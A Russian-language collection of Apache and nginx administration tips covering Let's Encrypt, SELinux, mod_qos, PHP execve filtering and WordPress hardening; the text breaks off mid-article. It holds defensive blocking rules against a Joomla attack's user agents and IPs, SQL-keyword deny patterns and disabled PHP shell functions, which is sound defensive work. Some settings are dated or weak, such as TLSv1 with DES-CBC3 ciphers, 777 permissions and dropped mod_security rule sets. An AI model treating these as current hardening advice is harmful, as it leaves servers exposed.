1. В chroot окружении обязательно должен быть /etc/passwd с пользователями для которых используется suexec. 2. Помещена ли в bin директорию программа suexec ? 3. Установлен ли suid root флаг для программы suexec ? (при копировании suid флаг исчезает). 4. Все ли динамические библиотеки присутствуют: chroot /hst /usr/local/apache/bin/ldd /usr/local/apache/bin/httpd chroot /hst /usr/local/apache/bin/ldd /usr/local/apache/bin/suexec предварительно положив ldd в /hst/usr/local/apache/bin/

Как организовать показ мини-иконок favicon.ico на своем сайте. [комментарии]

1. Добавляем в mime.types в конфигурации Apache строку: image/x-icon ico (Если не добавить, при использовании Russian Apache иконка отображаться не будет !!) 2. Помещаем на html страницу код: <link rel="SHORTCUT ICON" href="/favicon.ico"> 3. Создаем иконку 16x16 в любом графическом редакторе в формате PNG. 4. Выкачиваем конвертер ftp://ftp.kernel.org/pub/software/graphics/pngtoico/ и преобразуем png в ico: pngtoico favicon.png > favicon.ico 5. Копируем favicon.ico в корень сайта.

Как прописать русский charset в английском Apache [обсудить]

AddDefaultCharset koi8-r

Как назначить cgi-скрипт как парсер файлов в прозрачном режиме [обсудить]

Напрмер, нужно чтобы все html файлы выдавались при их запросе после прохождения через скрипт-фильтр parser.cgi В .htaccess: AddType parsed-html .html Action parsed-html /cgi-bin/parser.cgi

Как изменить expire дату для определенного типа файлов [обсудить]

В .htaccess пишем: ExpiresActive On ExpiresByType image/png "access plus 1 month" ExpiresByType image/gif "access plus 1 month" ExpiresDefault "access plus 1 month"

Как посмотреть список текущих активных модулей в Apache [комментарии]

httpd -l

Развёртывание приложений .NET/ASP.NET Core в Ubuntu 20.04 с Nginx (доп. ссылка 1) Автор: Артём Конкин [комментарии]

Данное руководство носит образовательный характер, и предназначено для тех - кто ни разу не запускал приложения ASP.Net на сервере. Для больших, сложных и серьёзных проектов не годится, так как не учтены все нюансы развёртывания и настройки безопасности. Этапы развертывания приложений на сервере Ubuntu 20.04
Сервер и соединение
Установка .net Core + ASP.net Core
Сборка приложения
Nginx и всё что с ним связано
Сервис приложения
Настройка прав пользователя Сервер и соединение Для того что бы развернуть приложение на .NET Core нам необходима виртуальная машина на Ubuntu - на ней мы и запустим наше первое приложение. Подключиться можно через SSH Установка .net Core + ASP.net Core Для начала нам нужно подключить репозиторий для того чтобы в последующем установить все нужные нам пакеты. wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb sudo dpkg -i packages-microsoft-prod.deb Установка пакетов sudo apt-get update sudo apt-get install -y apt-transport-https sudo apt-get update sudo apt-get install -y dotnet-sdk-3.1 sudo apt-get install -y aspnetcore-runtime-3.1 Сборка приложения На этом этапе нам нужно скомпилировать приложение и получить исполняемые файлы которые мы будем запускать в виртуальной машине. Создадим проект dotnet new webapp -o ProjectName cd ProjectName Сборка приложения dotnet publish --configuration Release В итоге мы получим в каталоге проекта по пути /bin/Release/ исполняемые файлы приложения. Nginx и всё что с ним связано Установка пакетов sudo apt install nginx sudo service nginx start В браузере должна открыться стартовая страница Nginx по умолчанию. Целевая страница доступна по адресу http://server_IP_address Настройка конфигурации Для того чтобы настроить сервер так как нам нужно необходимо отредактировать конфиг Nginx в директории /etc/nginx/sites-available/ sudo vi /etc/nginx/sites-available/default server { listen 80; server_name example.com *.example.com; location / { proxy_pass http://localhost:5000; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection keep-alive; proxy_set_header Host $host; proxy_cache_bypass $http_upgrade; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; } } Сервис приложения Создайте файл определения службы. sudo vi /etc/systemd/system/dotnetapp.service Добавляем конфигурацию сервиса [Unit] Description=Example .NET Web API App running on Ubuntu [Service] WorkingDirectory=/var/www/helloapp ExecStart=/usr/bin/dotnet /var/www/helloapp/helloapp.dll Restart=always # Restart service after 10 seconds if the dotnet service crashes: RestartSec=10 KillSignal=SIGINT SyslogIdentifier=dotnet-example User=www-data Environment=ASPNETCORE_ENVIRONMENT=Production Environment=DOTNET_PRINT_TELEMETRY_MESSAGE=false [Install] WantedBy=multi-user.target Запуск сервиса sudo systemctl enable dotnetapp.service Проверка статуса сервиса sudo systemctl status dotnetapp.service Перезапуск сервиса sudo systemctl restart dotnetapp.service Daemon reload sudo systemctl daemon-reload Настройка прав пользователя Группа www-data Пользователь (www-data) должен существовать и иметь права владельца в отношении файлов приложения. www-data создаётся автоматически при установке Nginx. Для того чтобы Nginx мог работать с каталогом нашего приложения нужно каталогу присвоить права пользователя www-data. sudo chown username:www-data /var/www/ -R sudo systemctl restart dotnetapp.service sudo chown -R www-data:username /var/www/* sudo systemctl status dotnetapp.service

Решение проблемы с постингом русских сообщений в phpBB+PostgreSQL Автор: frozer [обсудить]

Проблема: при постинге в форму сообщений на русском языки иногда вываливается ошибка скрипта insludes/function_search.php Решение: запустить psql >ALTER TABLE phpbb_search_wordlist DROP CONSTRAINT phpbb_search_wordlist_pkey; >CREATE INDEX phpbb_search_wordlist_pkey ON phpbb_search_wordlist (word_text);

Ограничение доступа и ресурсов, безопасность

Диапазоны IP-адресов облачных сервисов Amazon, Google, OVH, DigitalOcean и Microsoft (доп. ссылка 1) [комментарии]

Иногда на сервере возникает необходимость динамического определения подключения пользователя, транзитно использующего окружение в одном из арендуемых облачных сервисов. Проект cloud-ranges поддерживает актуальную БД диапазонов адресов различных облачных операторов, которую можно загрузить со страницы https://github.com/pry0cc/cloud-ranges/tree/master/companies Также могут оказаться полезными база IP в привязке к странам: ftp://ftp.ripe.net/ripe/dbase/split/ripe.db.inetnum.gz и базы адресов выходных узлов Tor: https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=IP_текущего хоста https://www.dan.me.uk/torlist/ https://torstatus.rueckgr.at/ip_list_all.php/Tor_ip_list_ALL.csv https://raw.githubusercontent.com/Machou/tor-ip-list/master/Tor_ip_list_ALL.csv Преобразовать указанные списки для mod_geo или mod_geo2 можно простым скриптом, например, curl https://raw.githubusercontent.com/Machou/tor-ip-list/master/Tor_ip_list_ALL.csv https://torstatus.rueckgr.at/ip_list_all.php/Tor_ip_list_ALL.csv | sort| uniq | grep -v "^#" |grep -E '^[0-9]+\.[0-9]+\.[0-9]+' | sed 's/$/ TT/' > /etc/httpd/conf/tor_db.txt После включения mod_geo2 в Apache LoadModule geo2_module /usr/lib64/httpd/modules/mod_geo2.so <IfModule geo2_module> GEOTable /etc/httpd/conf/tor_db.txt GEOActive Off </IfModule> в скриптах можно узнавать факт подключения через облачных провайдеров или Tor анализируя переменную окружения "HTTP_IP_GEO" (в примере выше для адресов Tor будет выставляться значение "TT").

Наиболее простой способ получения и обновления сертификатов Let's Encrypt [комментарии]

В рамках проекта dehydrated (https://github.com/lukas2511/dehydrated) развивается shell-скрипт для автоматизации действий по получению SSL-сертификатов в некоммерческом удостоверяющем центре Let's Encrypt (https://letsencrypt.org/). Регистрация в сервисе, получение сертификата и его последующее обновление предельно упрощено и требует только указания домена в файле конфигурации, создания проверочного пути на сайте и запуска скрипта. Пользователи RHEL/CentOS могут установить dehydrated из репозитория EPEL: yum install dehydrated Скрипт также присутствует в портах FreeBSD, в репозитории Fedora, Ubuntu и многих других дистрибутивов Linux. После установки прописываем домены, для которых необходим сертификат, в файле /etc/dehydrated/domains.txt (можно определить несколько строк с разными доменами для разных сертификатов): example.com www.example.com example2.com www.example2.com test.example2.com В иерархии каталогов, в которых хранится контент example.com, создаём каталог .well-known и подкаталог acme-challenge, в которых будет создан временный файл для проверки наличия контроля за сайтом: mkdir /var/www/htdocs/.well-known mkdir /var/www/htdocs/.well-known/acme-challenge Указываем в файле конфигурации /etc/dehydrated/config каталоги и email для связи, остальные параметры можно оставить по умолчанию: WELLKNOWN="/var/www/htdocs/.well-known/acme-challenge" CONTACT_EMAIL="example@examplemail.com" Далее запускаем скрипт dehydrated с опцией "-с", которой достаточно для большинства ситуаций. После первого запуска будет совершена регистрация в Let's Encrypt, после чего будет инициирован процесс проверки путем генерации токена в директории .well-known/acme-challenge с его последующим внешним запросом. dehydrated -c # INFO: Using main config file /etc/dehydrated/config # INFO: Using additional config file /etc/dehydrated/conf.d/local.sh Processing example.com with alternative names: www.example.com + Signing domains... + Creating new directory /etc/dehydrated/certs/example.com ... + Generating private key... + Generating signing request... + Requesting challenge for example.com... Если проверка прошла удачно, готовые сертификаты будут сохранены в каталог /etc/dehydrated/certs/example.com, который можно указать в настройках сервера. Например, в nginx: ssl on; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_certificate /etc/dehydrated/certs/example.com/fullchain.pem; ssl_certificate_key /etc/dehydrated/certs/example.com/privkey.pem; ssl_session_cache shared:SSL:10m; ssl_session_timeout 10m; ssl_ciphers 'ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA'; ssl_prefer_server_ciphers on; ssl_dhparam /etc/nginx/ssl/dhparams.pem; # генерируется через "openssl dhparam -dsaparam -out /etc/nginx/ssl/dhparams.pem 2048" В случае повторного запуска "dehydrated -c" будет выполнена проверка срока действия сертификата и если до окончания его действия остаётся менее 30 дней будет запрошено обновление. Для автоматизации поддержания сертификатов можно добавить "dehydrated -c" в cron. dehydrated -c # INFO: Using main config file /etc/dehydrated/config # INFO: Using additional config file /etc/dehydrated/conf.d/local.sh Processing example.com with alternative names: www.example.com + Checking domain name(s) of existing cert... unchanged. + Checking expire date of existing cert... + Valid till Sep 11 03:53:00 2017 GMT (Longer than 30 days). Skipping renew! После обновления сертификата не забудьте перезапустить HTTP-сервер: systemctl restart nginx В случае необходимости получения сертификатов для нескольких доменов, следует для всех сайтов позаботиться о пробросе проверочных запросов в каталог, заданный в переменной WELLKNOWN (проверка осуществляется через запрос http://example.com/.well-known/acme-challenge/m4g1C-t0k3n). Например, можно добавить в конфигурацию хоста в nginx: location /.well-known/acme-challenge { alias /var/www/htdocs/.well-known/acme-challenge; }

Блокировка атаки на Joomla силами nginx и apache (доп. ссылка 1) [комментарии]

Продолжается массовая атака на сайты под управлением Joomla. К сожалению на базе данной CMS в сети много сайтов, администраторы которых не спешат устанавливать обновления. На системах хостинга можно попытаться блокировать типовую автоматизированную атаку централизованно, на стороне сервера. Для блокировки можно заблокировать обращение c User Agent "JDatabaseDriverMysql" и "O:", а также запретить обращение c IP-адресов, с которых зафиксировано проведение атаки. Пример для nginx: http { map $http_user_agent $blocked_ua { ~(?i)JDatabaseDriverMysql 1; ~(?i)O: 1; default 0; } map $remote_addr $blocked_ip { 74.3.170.33 1; 146.0.72.83 1; 194.28.174.106 1; default 0; } server { listen 80; if ($blocked_ua) { return 403; } if ($blocked_ip) { return 403; } # ... } } Пример для apache httpd: RewriteCond %{REMOTE_ADDR} =74.3.170.33 [OR] RewriteCond %{REMOTE_ADDR} =146.0.72.83 [OR] RewriteCond %{REMOTE_ADDR} =194.28.174.106 RewriteRule .* / [F] RewriteCond %{HTTP_USER_AGENT} JDatabaseDriverMysql [OR] RewriteCond %{HTTP_USER_AGENT} O\: RewriteRule .* / [F]

Получение сертификата через общедоступный удостоверяющий центр LetsEncrypt (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Удостоверяющий центр LetsEncrypt контролируется сообществом и позволяет любому желающему бесплатно получить TLS-сертификат для организации доступа через защищённое соединение к своему сайту. Для прохождения верификации перед получением сертификата достаточно продемонстрировать контроль над доменом через размещения файла с ключом на web-сервере или запуска специального автоматизированного крипта. Инструментарий для верификации домена и управления сертификатами можно загрузить с сайта проекта: git clone https://github.com/letsencrypt/letsencrypt cd letsencrypt ./letsencrypt-auto --help или установить готовые пакеты для Fedora 23: dnf install letsencrypt Основные методы верификации: 1. Ручной метод: генерация кода подтверждения и его копирование на web-сервер. Генерируем проверочный код: letsencrypt --text --email recovery@example.com --domains www.example.com,example.com,foo.example.com --agree-tos --renew-by-default --manual certonly Записываем полученный код на web-сервер в файл .well-known/acme-challenge/anotherrandomthinghere, относительно корня сайта: cd /var/www/html mkdir -p .well-known/acme-challenge echo "224234fSDFSF23SFADASD" > .well-known/acme-challenge/anotherrandomthinghere 2. Самодостаточная проверка: на время проверки letsencrypt берёт на себя функции http-сервера, связанного с верифицируемым доменом (хост, на который указывает "A" запись в DNS), и напрямую отвечает на запросы сервиса. На сервере, где будет обслуживаться домен запускаем (http-сервер сайта должен быть отключен, метод подходит для начальной конфигурации ещё не введённых в строй сайтов): letsencrypt --text --renew-by-default --email recovery@example.com --domains www.example.com,example.com,foo.example.com --agree-tos --standalone --standalone-supported-challenges http-01 certonly 3. Проверка через автоматизированное создание файлов к корне web-сервера. На сервере, где работает сайт проверяемого домена, запускаем (/var/www/html - путь к корню сайта, относительно которого будут временно размещены коды для верификации): letsencrypt --text --renew-by-default --email recovery@example.com --domains www.example.com,example.com,foo.example.com --agree-tos --webroot --webroot-path /var/www/html certonly При выполнении автоматизированной проверки от пользователя root готовые сертификаты будут скопированы в директорию /etc/letsencrypt. Для их подключения к mod_ssl можно выполнить: ln -s /etc/letsencrypt/live/www.example.com/cert.pem /etc/pki/tls/certs/www.example.com.crt ln -s /etc/letsencrypt/live/www.example.com/chain.pem /etc/pki/tls/certs/www.example.com.chain.crt ln -s /etc/letsencrypt/live/www.example.com/privkey.pem /etc/pki/tls/private/www.example.com.key cp /etc/httpd/conf.d/ssl.conf{,.backup} sed -i 's@$SSLCertificateFile$ .*@\1 /etc/pki/tls/certs/www.example.com.crt@' /etc/httpd/conf.d/ssl.conf sed -i 's@$SSLCertificateKeyFile$ .*@\1 /etc/pki/tls/private/www.example.com.key@' /etc/httpd/conf.d/ssl.conf sed -i 's@#$SSLCertificateChainFile$ .*@\1 /etc/pki/tls/certs/www.example.com.chain.crt@' /etc/httpd/conf.d/ssl.conf После чего нужно сделать директории с сертификатами доступными в SELinux-контексте cert_t: semanage fcontext -a -t cert_t '/etc/letsencrypt/(archive|live)(/.*)?' restorecon -Rv /etc/letsencrypt По умолчанию время жизни сертификата LetsEncrypt составляет 90 дней, что требует настройки автоматизации обновления сертификата. Например, раз в 60 дней через cron можно вызывать скрипт, который будет продлевать сертификат на очередные 90 дней: /usr/bin/letsencrypt -d www.example.com --renew-by-default -m recovery@example.com --agree-tos -t --webroot -w /var/www/html certonly Пример unit-файла /etc/systemd/system/www-example-com-renewal.service для обновления сертификатов: [Unit] Description=Automatically renew the www.example.com certificate [Service] Type=oneshot ExecStart=/usr/bin/letsencrypt -d www.example.com --renew-by-default -m recovery@example.com --agree-tos -t --webroot -w /var/www/html certonly ExecStart=/usr/sbin/systemctl reload httpd Файл автозапуска /etc/systemd/system/www-example-com-renewal.timer: [Unit] Description=Trigger an automatic renewal every month [Timer] OnCalendar=monthly Persistent=true [Install] WantedBy=multi-user.target В случае необходимости отзыва сертификата, например, после утечки закрытых ключей, можно выполнить команду: letsencrypt revoke --cert-path /etc/letsencrypt/archive/www.example.com/cert1.pem Для упрощения работы с сервисом можно использовать скрипт-обвязку https://github.com/lukas2511/letsencrypt.sh

Как сменить корень документов в Apache/nginx в CentOS 7 и RHEL 7 с SELinux [комментарии]

По умолчанию для Apache, nginx и других http-серверов при использовании SELinux в CentOS 7 и RHEL 7 область видимости ограничена директорией /var/www. Для смены корня документов на /home/site следует включить новые директории в правила httpd_sys_content_t и httpd_sys_script_exec_t. Включаем временно: chcon -R -t httpd_sys_content_t /home/site chcon -R -t httpd_sys_script_exec_t /home/site/cgi-bin Включаем постоянно: semanage fcontext -a -t httpd_sys_content_t "/home/site(/.*)?" semanage fcontext -a -t httpd_sys_script_exec_t "/home/site/cgi-bin(/.*)?" restorecon -r -v /home/site Отслеживаем возможные проблемы в /var/log/audit/audit.log и при необходимости строим свои правила обхода. В качестве шаблона можно использовать результат работы утилиты audit2allow: audit2allow -M policy_name -i /var/log/audit/audit.log semodule -i policy_name.pp Не забываем открыть доступ к сетевым портам на межсетевом экране: firewall-cmd --permanent --add-port=80/tcp firewall-cmd --permanent --add-port=443/tcp

Использование amon для дополнительной защиты PHP-интерпретатора от выполнения внешних программ (доп. ссылка 1) [комментарии]

Для экспресс-блокировки выполняемых при работе определенного PHP-скрипта внешних программ удобно использовать библиотеку amon.so (http://www.lucaercoli.it/amon.html), которая подменяет своим обработчиком системный вызов execve() и контролирует его выполнение. Библиотека amon.so рассчитана на тесное взаимодействие с PHP и учитывает особенности его работы, позволяя защититься от простейших атак и блокировать работу бэкдоров, подобных r57shell. Так как библиотека amon пока отсутствует в стандартных пакетах, загрузим и соберем её вручную (пример для Debian/Ubuntu). Устанавливаем необходимые для сборки компоненты: apt-get install build-essential Загружаем amon: wget http://www.lucaercoli.it/amon/amon.c Открываем файл amon.c и находим в верхней части строку "char * cmds []", в которой определен список допустимых команд. При необходимости правим список на своё усмотрение. По умолчанию список разрешенных программ выглядит следующим образом: "/usr/sbin/sendmail" "/usr/lib/sendmail" "/etc/alternatives/lib.sendmail" "/usr/lib/sm.bin/sendmail" "/usr/bin/mail" "/bin/mv" "/bin/rm" "/usr/bin/unlink" "/bin/rmdir" "/bin/cp" "/bin/date" "/bin/bzip2" "/bin/gunzip" "/bin/gzip" "/usr/bin/unzip" "/bin/tar" "/usr/bin/host" "/usr/bin/file" "/usr/bin/uptime" "/bin/grep" "/usr/bin/diff3" "/bin/pwd" Компилируем amon gcc -fPIC -shared -ldl -o amon.so amon.c Копируем amon.so в директорию /lib: mv ./amon.so /lib/ В простейшем случае для защиты php-скрипта, запущенного в командной строке или в режиме CGI можно использовать следующий скрипт (php5-cgi-wrapper): #!/bin/sh export LD_PRELOAD=amon.so exec /path/del/vero/php5-cgi "$@" При использовании механизма suEXEC, этот скрипт можно прописать вместо вызова php, например, указать в конфигурации apache: ScriptAlias /php_amon/ "/usr/local/bin/" AddHandler php-script .php Action php-script /php_amon/php5-cgi-wrapper В случае необходимости работы php в виде модуля (libapache2-mod-php5), работающего внутри Apache, добавляем в /etc/apache2/envvars: export LD_PRELOAD=amon.so и перезапускаем apache: /etc/init.d/apache2 restart Для проверки загрузилась ли библиотека создадим и запустим простейший скрипт, в выводе которого должно быть упоминание amon.so: <?php phpinfo(); ?> Для php-скриптов, работающих в режиме FastCGI через mod_fcgid, достаточно написать промежуточный shell-скрипт, который использовать для запуска основного php-скрипта: #!/bin/sh export PHPRC=/etc/php5/cgi export LD_PRELOAD = amon.so exec /usr/lib/cgi-bin/php В ситуации, когда php-скрипт попытается запустить, допустим, /bin/sh, операция будет блокирована, а в error.log будет оставлена запись: sh: command_name: command not found

Использование mod_qos для минимизации паразитной нагрузки на сайт (доп. ссылка 1) [комментарии]

Apache-модуль mod_qos (http://mod-qos.sourceforge.net/) позволяет организовать разделение запросов по приоритетам и обеспечить выполнение только приоритетных запросов при таких нештатных ситуациях, как перегрузка сервера. В качестве реакции при нехватке серверных ресурсов mod_qos может блокировать неприоритетные запросы, динамически изменять значения таймаутов, добавлять искусственную задержку перед выполнением запроса и принудительно завершать TCP-соединения. Примеры ситуация, когда можно использовать mod_qos: * Управление интенсивностью выполнения длительных по времени и ресурсоемких запросов, предотвращение одновременного выполнения большого числа таких запросов; * Защита от исчерпания пропускной способности канала связи из-за слишком большого числа одновременных обращений к определенным данным (например, когда пользователь сделал доступным для загрузки файл большого размера и широко его разрекламировал) * Защита от простейших DDoS-атак. Некоторые примеры ограничений, реализуемых через mod_qos ограничений: * Ограничение максимального числа одновременных соединений для заданной части сайта, URL или виртуального хоста. * Ограничение пропускной способности, числа запросов в секунду или объема трафика в секунду для любой части сайта; * Ограничение числа выполнения определенных типов запросов в секунду; * Не применение ограничений для определенных адресов или пользователей; * Фильтрация по совпадению маски в HTTP-заголовке или теле запроса; * Ограничение размера передаваемых в рамках запроса данных; * Ограничение на уровне параметров TCP-соединений, например, ограничение максимального числа запросов с одного IP, динамическое изменение keep-alive и т.п. * Обеспечение доступа с заданных IP в случае исчерпания свободных сокетов. Пример установки и настройки типовой конфигурации в Debian/GNU Linux На сайте http://mod-qos.sourceforge.net/ приведен большой набор практических примеров конфигурации mod_qos. Рассмотрим типовой вариант. Так как mod_qos нет в стандартных репозиториях, установим данный модуль из исходных текстов. Устанавливаем пакеты, необходимые для сборки модулей Apache: apt-get install apache2-threaded-dev gcc Загружаем архив с исходными текстами mod_qos с сайта ttp://sourceforge.net/projects/mod-qos/ wget http://downloads.sourceforge.net/project/mod-qos/9.9/mod_qos-9.9.tar.gz?use_mirror=voxel tar xvfz mod_qos-9.9.tar.gz Собираем и устанавливаем: cd mod_qos-9.9/apache2/ apxs2 -i -c mod_qos.c После этого модуль будет установлен как /usr/lib/apache2/modules/mod_qos.so Активируем модуль в Apache. В директории /etc/apache2/mods-available создаем два файла qos.load и qos.conf В qos.load добавляем строку для загрузки модуля: LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so В qos.conf определяем конфигурацию модуля (подобные блоки конфигурации можно привязывать к отдельным блокам Location и VirtualHost): ## Настройка QoS <IfModule mod_qos.c> # Размер буфера обрабатываемых IP-адресов клиентов. # По умолчанию 50 тыс. На каждый IP тратится 63 байта QS_ClientEntries 100000 # Максимальное число одновременных соединений с одного IP QS_SrvMaxConnPerIP 50 # Общее максимальное число одновременных обращений к серверу MaxClients 256 # Понижаем лимит для отдельных URL QS_LocRequestLimit /aaa 100 QS_LocRequestLimit /bbb 10 QS_LocRequestLimit /ccc 5 QS_LocRequestLimitMatch "^(/dd1/|/dd2/).*$" 100 # Недопускаем более 50 запросов в секунду для заданного URL QS_LocRequestPerSecLimit /download/file.iso 50 # Не распространять правила блокировки на запросы, пришедшие с заголовком mod-qos-login QS_VipIPHeaderName mod-qos-login # Отключаем keep-alive когда достигнуто значение в 70% от максимального лимита соединений QS_SrvMaxConnClose 180 # Минимальная скорость поступления запросов и генерации ответов, # позволяет защитить сервер от наводнения медленными запросами, которые длительное время висят без передачи данных QS_SrvMinDataRate 150 1200 # Ограничение размера заголовков и тела запроса (следует изменить в соответствии со спецификой сайта) # LimitRequestFields 30 # QS_LimitRequestBody 102400 # Отключаем лимит для заданных подсетей QS_SrvMaxConnExcludeIP 172.18.3.32 QS_SrvMaxConnExcludeIP 192.168.10. # События, связанные с блокировками сохраняем в отдельном логе CustomLog logs/qsaudit_log "%{qos-path}n%{qos-query}n" # Ограничиваем размер тела запроса в зависимости от mime-типа (для работы требуется модуль mod_parp): SetEnvIfNoCase Content-Type application/x-www-form-urlencoded QS_LimitRequestBody=131072 SetEnvIfNoCase Content-Type multipart/form-data QS_LimitRequestBody=131072 SetEnvIfNoCase Content-Type multipart/mixed QS_LimitRequestBody=131072 # Для заданного Location блокируем запросы по масками, для защиты от подстановки SQL запросов <Location /app> QS_DenyQueryBody on QS_DenyQuery +s01 deny "(EXEC|SELECT|INSERT|UPDATE|DELETE)" </Location> # Пример установки разных лимитов в зависимости от типа браузера, для ботов ставим более жесткие лимиты BrowserMatch "slurp" QS_Cond=spider BrowserMatch "googlebot" QS_Cond=spider QS_LocRequestLimitMatch "^(/app/b/|/app/c/).*$" 300 QS_CondLocRequestLimitMatch "^(/app/b/|/app/c/).*$" 10 spider </IfModule> Активируем модуль и перезапускаем apache: a2enmod qos /etc/init.d/apache2 restart При просмотре статистики через открытие http://ваш_сайт/server-status можно посмотреть дополнительную информацию о работе и настройках mod_qos.

Увеличение безопасности WordPress на типовом хостинге (доп. ссылка 1) Автор: Pentarh Udi [комментарии]

Небольшой дайджест по обеспечению безопасности WordPress и других PHP OpenSource приложений. Рассмотрено, что можно сделать на среднестатистическом хостинге. В общем, safe_mode включать нельзя. Это урежет все до безобразия. Вместо этого мы: 1. Включим open_basedir 2. Подтюним некоторые настройки php 3. Выключим шелл вызовы 4. Выставим нужные права на директории 5. Для особых извращенцев, включим mod_security Так же не стоит брезговать базовыми правилами безопасности WordPress (http://www.awmpage.com/2008/10/bezopasnost-wordpress/). Включаем open_basedir --------------------- Тут все просто. Три настройки в виртуалхосте: php_admin_value open_basedir "/home/blogs/blog1.foobar.com" php_admin_value upload_tmp_dir "/home/blogs/blog1.foobar.com/wp-tmp" php_admin_value session.save_path "/home/blogs/blog1.foobar.com/wp-tmp" Где "/home/blogs/blog1.foobar.com" - корень домена блога. Там необходимо создать директорию "wp-tmp", дать ей права 777 и желательно в эту директорию в том же виртуалхосте запретить доступ: <Directory /home/blogs/blog1.foobar.com/wp-tmp> Order Deny,Allow Deny from All </Directory> Мало-ли, может кто то туда сможет чего то записать. И чтобы это что то не было доступно из веба. Так же как и ваши сессии. Некоторые дополнительные ограничения PHP5 ----------------------------------------- Эти настройки внесут дополнительный плюс к безопасности php_admin_flag track_vars on php_admin_flag allow_url_fopen off php_admin_flag allow_url_include off php_admin_value memory_limit 30M php_admin_flag enable_dl off Думаю, это не все, что можно сделать с настройками - пожелания приветствуются. Выключаем шелл вызовы --------------------- open_basedir не распространяется на шелл вызовы php: system,exec,popen,passthru. С другой стороны, зачем вордпрессу эти вызовы? Ну вот и отключим их с помощью disable_functions. disable_functions="exec,system,passthru,popen" Далее возникает желание добавить в конфигурацию virtual host такие строки: php_admin_value "disable_functions" "exec,system,passthru,popen" Но это не сработает, т.к. disable_functions работает только когда включен в глобальном php.ini. Конечно, в phpinfo() вы увидите правильное значение disable_functions, однако "отключенные" функции будут продолжать действовать. Разработчики объяснили это тем, что отключать функции на уровне конфигурации апача очень накладно, гораздо проще выключить их вообще из php.ini Но с другой стороны, шелл вызовы достаточно часто используются в CLI скриптах, в то время как в веб скриптах в большинстве случаев их можно отключить. Значит нужно разделить конфиги CLI и Web. В первом конфиге оставить шелл вызовы, а во втором, более подверженном хаку, их отключить. Предположим, что дефолтный конфиг php.ini лежит в /usr/local/lib (стандартное место на FreeBSD). Скопируем его в /usr/local/etc/apache2. И на новом месте пропишем нужные disable_functions. Далее, в httpd.conf пишем: PHPIniDir /usr/local/etc/apache2/conf И рестартуем апач. Все, теперь CLI и Web версии PHP имеют независимые конфиги и в последнем отключены шелл вызовы. Выставляем нужные права на директории ------------------------------------- Даже если злоумышленник каким то образом проник внутрь через дырку вордпресса, он начнет сканировать директории в поисках куда бы запихнуть iframe. Что же, давайте сделаем его слепым. Предполагается, что директории будут сканироваться из под юзера апача. Предполагается, что директории блогов находятся в /home/blogs/{blog}.domain.com Значит, на директории /home,/home/blogs,/home/blogs/{blog}.domain.com ставим права 711. На директорию конфигов апача и ниже - так же ставим 711. Все файлы внутри будут иметь аттрибуты 600. Все директории и файлы в конфигах апача должны иметь овнера root. Рекомендуется проделать эти телодвижения со всеми местами, где злоумышленник может найти полные пути к блогам. Включаем mod_security --------------------- Это тяжелая артилерия. Для тех, кто не в курсе, mod_security это модуль, который мониторит входящие GET/POST/HEAD запросы и исходящие text/* ответы сервера на предмет наиболее распространенных атак, инъекций и прочей ереси. Здесь будет описываться mod_security2 для Apache v2. Конечно, эта штука немного отяжелит апач, но по опыту скажу, что не фатально и оно того стоит. Как ставить mod_security можно узнать в гугле. В простейшем случае на FreeBSD это прекрасно ставится из портов. На CentOS mod_security ставится из репозитория http://www.jasonlitka.com/yum-repository/ . После прописывания репозитория просто набрать команду # yum install mod_security Сразу скажу, mod_security рубит на корню phpmyadmin. По этому в тех приложениях, где mod_security явно вредит, можно его выключить опцией httpd.conf: SecRuleEngine Off Так же mod_security откажется работать без модуля mod_unique_id. Поговорим о том, как паранойю mod_security сделать здоровой :) Этот модуль хорош, когда правильно настроены правила. По умолчанию он идет с параноидальным набором правил. Многие из них вообще ни к чему и их можно свободно отключить. В файле modsecurity_crs_10_config.conf, думаю, стоит понизить значение SecDebugLogLevel до 0-2. Следующие файлы с наборами правил стоит вообще либо закомментировать, либо удалить: modsecurity_crs_20_protocol_violations.conf modsecurity_crs_21_protocol_anomalies.conf modsecurity_crs_30_http_policy.conf modsecurity_crs_35_bad_robots.conf modsecurity_crs_55_marketing.conf Остальные файлы нужно чуток подредактировать. modsecurity_crs_40_generic_attacks.conf Следующие секции я не нашел полезными: * Session fixation * Coldfusion injection * LDAP injection * HTTP Response Splitting modsecurity_crs_45_trojans.conf - тут все впорядке modsecurity_crs_50_outbound.conf - правила для исходящей информации. Я бы здесь оставил только SQL Errors leakage

Особенности работы длительно выполняющихся PHP скриптов в Apache (доп. ссылка 1) Автор: mysqlperformanceblog.com [комментарии]
Рассмотрим поведение Apache при принудительном закрытии клиентом окна браузера, в котором отображался вывод еще не завершенного PHP скрипта. Например, скрипт зациклился или пользователь устал ждать конца операции.
